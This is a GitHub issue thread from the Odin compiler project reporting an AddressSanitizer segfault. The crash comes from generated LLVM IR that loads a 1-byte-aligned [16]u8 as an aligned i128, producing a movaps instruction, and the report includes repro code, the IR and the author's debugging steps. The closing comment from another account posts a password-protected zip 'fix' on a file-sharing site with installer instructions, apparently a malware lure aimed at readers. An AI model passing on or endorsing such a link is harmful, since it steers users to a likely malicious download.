### ISSUE TITLE
Comparison of inline transmuted `[16]u8` to `u128` under address sanitize results in segfault

### ISSUE THREAD

**Issue by Feoramund** [odin-lang/Odin#4145]
I caught this while running `-sanitize:address` on the test suite and found it appearing in the `uuid` tests, specifically. I used `transmute(u128be)` there for a couple of the tests.

Example minimal program:
```odin
package main

main :: proc() {
	x: [16]u8
	y: u128 = 123456789
	z := y != transmute(u128)x
}
```

I suspect this has something to do with the LLVM code generation:

```llvm
; Function Attrs: sanitize_address
define internal void @main.main(ptr noalias nocapture nonnull %__.context_ptr) #1 {
decls:
  %x = alloca [16 x i8], align 1
  %y = alloca i128, align 16
  %z = alloca i8, align 1
  br label %entry

entry:                                            ; preds = %decls
  %0 = call ptr @__asan_memset(ptr %x, i32 0, i64 16)
  store i128 123456789, ptr %y, align 16
  %1 = load i128, ptr %y, align 16
  %2 = load i128, ptr %x, align 16
  %3 = icmp ne i128 %1, %2
  %4 = zext i1 %3 to i8
  store i8 %4, ptr %z, align 1
  ret void
}
```

Using LLDB, I found the program segfaulted on a `movaps` instruction (`0x0F 0x28`, specifically) generated by the above IR for my machine, so I read [Felix Cloutier's x86 reference](https://www.felixcloutier.com/x86/movaps) and found this following excerpt:

```text
When the source or destination operand is a memory operand, the operand must be
aligned on a 16-byte boundary or a general-protection exception (#GP) will be
generated. To move single precision floating-point values to and from unaligned
memory locations, use the VMOVUPS instruction.
```

I hexed the `0x28` to a `0x10` for both instructions, making them `movups`, and everything worked without an issue. Changing the alloca alignment of `%x` to 16 and re-compiling through `clang` also prevents the segfault.

I have an idea of how to fix this in the compiler, but it involves LLVM internals unfamiliar to me.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
